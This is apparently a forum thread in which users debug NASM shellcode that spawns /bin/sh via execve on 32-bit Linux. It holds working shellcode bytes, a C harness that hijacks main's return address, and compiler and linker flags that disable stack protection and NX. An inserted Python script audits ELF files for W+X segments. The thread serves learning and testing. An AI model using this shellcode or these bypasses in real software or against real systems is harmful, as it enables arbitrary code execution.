4

I am using Ubuntu 14.04, 64-bit. I am studying shellcode writing, so to spawn a shell I wrote the following program:

segment .text
global _start
_start:

jmp short GotoCall

shellcode:
    pop esi                     ; esi -> '/bin/shJAAAABBBB' (address pushed by the call below)
    xor eax, eax
    mov byte [esi + 7], al      ; here I get the error (writes a NUL over the 'J')
    lea ebx, [esi]
    mov dword [esi + 8], ebx    ; argv[0] = address of "/bin/sh" (overwrites "AAAA")
    mov dword [esi + 12], eax   ; argv[1] = NULL (overwrites "BBBB")

    mov al, 0x0b                ; execve syscall number
    mov ebx, esi                ; filename
    lea ecx, [esi + 8]          ; argv
    lea edx, [esi + 12]         ; envp
    int 80h

GotoCall:
    call shellcode
    db '/bin/shJAAAABBBB'

Compiled -> nasm -ggdb -f elf Shellcode_Execve.asm

Linked -> ld -m elf_i386 -ggdb -o Shellcode_Execve Shellcode_Execve.o

When I ran it in GDB, I found that I get the error at the instruction below:

mov byte [esi + 7], al

I found that this is because of DEP (Data Execution Prevention). So I tried "-fno-stack-protector -z execstack" to compile and link, like below:

$ nasm -ggdb -f elf32 -z execstack Shellcode_Execve.asm
nasm: error: unrecognised option `-z'
nasm: error: more than one input file specified
type `nasm -h' for help

$ nasm -ggdb -f elf32 -z execstack -o shell Shellcode_Execve.asm
nasm: error: unrecognised option `-z'
nasm: error: more than one input file specified
type `nasm -h' for help

$ nasm -ggdb -z execstack -f elf32  -o shell Shellcode_Execve.asm
nasm: error: unrecognised option `-z'
nasm: error: more than one input file specified
type `nasm -h' for help

$ nasm -ggdb  -fno-stack-protector -z execstack -z execstack -f elf32  -o shell Shellcode_Execve.asm
nasm: fatal: unrecognised output format `no-stack-protector' - use -hf for a list
type `nasm -h' for help

$ nasm -ggdb -f elf32 Shellcode_Execve.asm

$ gcc -ggdb -m32 -fno-stack-protector -z execstack -o Shellcode_Execve Shellcode_Execve.o
Shellcode_Execve.o:Shellcode_Execve.asm:5: multiple definition of `_start'
/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../../lib32/crt1.o:(.text+0x0): first defined here
/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../../lib32/crt1.o: In function `_start':
(.text+0x18): undefined reference to `main'
collect2: error: ld returned 1 exit status

$ nasm -ggdb -f elf32 Shellcode_Execve.asm

$ gcc -ggdb -m32 -fno-stack-protector -z execstack -o Shellcode_Execve Shellcode_Execve.o

$ ./Shellcode_Execve 
Segmentation fault (core dumped)

$ nasm -ggdb -f elf32 Shellcode_Execve.asm

$ ld -m elf_i386 -ggdb -z execstack -o Shellcode_Execve Shellcode_Execve.o

$ ./Shellcode_Execve 
Segmentation fault (core dumped)

As shown above, I tried all the ways to disable DEP using GCC and ld, but nothing works. So how can I disable DEP and make my code work? (Please make sure the problem is DEP.)

mr.Cracker

2 Answers

4

I have changed my NASM code a little bit; now it looks like below:

section .mytext progbits alloc exec write align=16  ; CHANGED HERE
    global _start
_start:
    jmp short GotoCall

    shellcode:
        pop esi                     ; esi -> '/bin/shJAAAABBBB' (address pushed by the call below)
        xor eax, eax
        mov byte [esi + 7], al      ; NUL-terminate "/bin/sh" (this section is now writable)
        lea ebx, [esi]
        mov dword [esi + 8], ebx    ; argv[0] = address of "/bin/sh"
        mov dword [esi + 12], eax   ; argv[1] = NULL

        mov al, 0x0b                ; execve syscall number
        mov ebx, esi                ; filename
        lea ecx, [esi + 8]          ; argv
        lea edx, [esi + 12]         ; envp
        int 80h

    GotoCall:
        call shellcode
        db '/bin/shJAAAABBBB'

The .text section is not writable by default. I just changed the first line to

"section .mytext progbits alloc exec write align=16"

For details about progbits alloc exec write, please click here.

And the linker has a default override, so it ignores a writable .text even if you ask for it. But it doesn't care if the section has a different name.

Now compile and link it:

nasm -f elf32 Shellcode_Execve.asm
ld -m elf_i386 -o Shellcode_Execve Shellcode_Execve.o

Now it WORKSSSS:)

mr.Cracker
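Whether `-z execstack` actually took effect, and whether the `.mytext ... exec write` trick produced a writable-and-executable segment, can both be read directly from the ELF program headers. The script below is an added example, not code from either poster: it parses the program headers of a little-endian ELF32/ELF64 image with Python's `struct`, reports an executable stack (PT_GNU_STACK carrying PF_X) and any PT_LOAD segment mapped W+X, and builds two constructed sample images (one standing in for the answer's binary, one for a default `ld` output) so it runs offline; pass a real file path to audit a binary.

```python
import struct, sys

PT_LOAD, PT_GNU_STACK = 1, 0x6474e551          # program header types
PF_X, PF_W, PF_R = 1, 2, 4                     # p_flags bits

def segment_audit(elf):
    """Report the two NX-relevant facts of a little-endian ELF32/ELF64 image:
    exec_stack: PF_X set on PT_GNU_STACK (what `ld -z execstack` emits; None if absent),
    wx_segments: [(p_vaddr, p_flags)] for PT_LOAD segments that are writable AND executable,
    which is what a section declared 'alloc exec write' becomes after linking."""
    if elf[:4] != b'\x7fELF' or elf[5] != 1:
        raise ValueError('expected a little-endian ELF file')
    if elf[4] == 1:                                       # ELFCLASS32
        phoff = struct.unpack_from('<I', elf, 28)[0]
        phentsize, phnum = struct.unpack_from('<HH', elf, 42)
        fmt, i_flags, i_vaddr = '<8I', 6, 2               # p_type,p_offset,p_vaddr,...,p_flags,p_align
    else:                                                 # ELFCLASS64
        phoff = struct.unpack_from('<Q', elf, 32)[0]
        phentsize, phnum = struct.unpack_from('<HH', elf, 54)
        fmt, i_flags, i_vaddr = '<2I6Q', 1, 3             # p_type,p_flags,p_offset,p_vaddr,...
    exec_stack, wx = None, []
    for n in range(phnum):
        ph = struct.unpack_from(fmt, elf, phoff + n * phentsize)
        if ph[0] == PT_GNU_STACK:
            exec_stack = bool(ph[i_flags] & PF_X)
        elif ph[0] == PT_LOAD and ph[i_flags] & PF_W and ph[i_flags] & PF_X:
            wx.append((ph[i_vaddr], ph[i_flags]))
    return {'exec_stack': exec_stack, 'wx_segments': wx}

def build_elf32(phdrs):
    """Constructed test input: a bare ELF32 header followed by the given program headers."""
    ident = b'\x7fELF' + bytes([1, 1, 1]) + bytes(9)      # class32, LE, version 1, SYSV ABI, pad
    ehdr = ident + struct.pack('<HHIIIIIHHHHHH', 2, 3, 1, 0x8048000, 52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    return ehdr + b''.join(struct.pack('<8I', *p) for p in phdrs)

# tuples: (p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align)
SAMPLE_RWX = build_elf32([        # what the 'exec write' section plus -z execstack produce
    (PT_LOAD, 0, 0x8048000, 0x8048000, 0x100, 0x100, PF_R | PF_W | PF_X, 0x1000),
    (PT_GNU_STACK, 0, 0, 0, 0, 0, PF_R | PF_W | PF_X, 16)])
SAMPLE_NX = build_elf32([         # default ld output: W^X segments, non-executable stack
    (PT_LOAD, 0, 0x8048000, 0x8048000, 0x100, 0x100, PF_R | PF_X, 0x1000),
    (PT_LOAD, 0x100, 0x8049100, 0x8049100, 0x20, 0x20, PF_R | PF_W, 0x1000),
    (PT_GNU_STACK, 0, 0, 0, 0, 0, PF_R | PF_W, 16)])

if __name__ == '__main__':
    data = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else SAMPLE_RWX
    print(segment_audit(data))
```

`readelf -lW` on the real binary shows the same headers; the script just makes the W+X and execstack checks scriptable across many files.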
0

I know I'm really late but I have been battling with this same code and the gcc stack protections. When turning it into shellcode with objdump -d I ended up with:

/* bytes taken from objdump -d of the NASM program above */
char shellcode[]="\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main(void)
{
    int *ret;
    ret = (int *)&ret + 2;      /* assumes the saved return address sits two words above ret */
    (*ret) = (int)shellcode;    /* returning from main then jumps into shellcode (needs -z execstack) */
    return 0;
}

Then, with the help of your tips I was able to compile and run it with:

~/Shellcode$ gcc -fno-stack-protector -z execstack execShellSpawn.c -o execShellSpawn

Without -z execstack I get a Segfault. Without -fno-stack-protector it accomplishes about as much as exit(0).

flerb